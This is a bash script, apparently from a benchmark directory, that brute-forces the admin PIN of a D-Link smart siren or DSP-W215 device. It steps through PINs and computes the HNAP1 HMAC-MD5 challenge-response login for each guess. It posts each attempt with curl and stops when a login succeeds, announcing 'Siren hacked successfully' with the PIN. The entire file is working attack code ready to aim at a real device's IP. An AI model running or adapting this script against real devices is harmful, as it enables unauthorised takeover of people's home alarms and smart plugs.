benchmarks/other/DLinkAlarm/attack.sh

   1 #!/bin/bash
   2 #modify next two line for your DSP-W215
   3 IP="192.168.0.4"
   4 #PIN=0
   5 PIN=215500
   6 #do not modify after this line if you don't know what you are doing
   7
   8 function usage {
   9         echo -e "\nUsage: $(basename $0) [OPTION]"
  10         echo -e "\nOPTION:"
  11         echo -e "\t--getstate"
  12         echo -e "\t--stop"
  13   echo -e "\t--noise SoundType(1-6) Volume(0-100) Duration(??)"
  14 }
  15
  16 function hash_hmac {
  17   data="$1"
  18   key="$2"
  19   echo -n "$data" | openssl dgst "-md5" -hmac "$key" -binary | xxd -ps -u
  20 }
  21
  22 contentType="Content-Type: text/xml; charset=utf-8"
  23 soapLogin="SOAPAction: \"http://purenetworks.com/HNAP1/Login\""
  24
  25 #Get Login data
  26
  27 head="<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body>"
  28 end="</soap:Body></soap:Envelope>"
  29
  30 message="<Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>request</Action><Username>admin</Username><LoginPassword>$password</LoginPassword><Captcha/></Login>"
  31 loginrequest="$head$message$end"
  32
  33 loop=true
  34 while $loop
  35       do
  36
  37 ret=`curl -s -X POST -H "$contentType" -H "$soapLogin" --data-binary "$loginrequest" http://$IP/HNAP1`
  38
  39 function getResult {
  40   opt=`echo -n "$ret" | grep -Po "(?<=<$1>).*(?=</$1>)"`
  41   echo -n "$opt"
  42 }
  43
  44 echo -e "Current pin: $PIN"
  45 let PIN=$PIN+1
  46 challenge=`getResult Challenge`
  47 cookie="Cookie: uid=`getResult Cookie`"
  48 publickey="`getResult PublicKey`$PIN"
  49 echo -e "Public key: $publickey"
  50 privatekey=`hash_hmac "$challenge" "$publickey"`
  51 password=`hash_hmac "$challenge" "$privatekey"`
  52 timestamp=`date +%s`
  53 auth_str="$timestamp\"http://purenetworks.com/HNAP1/Login\""
  54 auth=`hash_hmac "$auth_str" "$privatekey"`
  55 hnap_auth="HNAP_AUTH: $auth $timestamp"
  56
  57 message="<Login xmlns=\"http://purenetworks.com/HNAP1/\"><Action>login</Action><Username>admin</Username><LoginPassword>$password</LoginPassword><Captcha/></Login>"
  58
  59 login="$head$message$end"
  60
  61 #Get Login Result
  62 mret=`curl -s -X POST -H "$contentType" -H "$soapLogin" -H "$hnap_auth" -H "$cookie" --data-binary "$login" http://$IP/HNAP1`
  63
  64 echo -e "$mret"
  65 status=`echo -n "$mret" | grep -Po "(?<=<LoginResult>).*(?=</LoginResult>)"`
  66 echo -e "Status: $status\n\n"
  67 if [ $status = "success" ]
  68 then
  69     echo -e "SUCCESSFUL ATTEMPT: Siren hacked successfully! The pin is: $PIN\n\n\n"
  70     loop=false
  71 fi
  72
  73 done
  74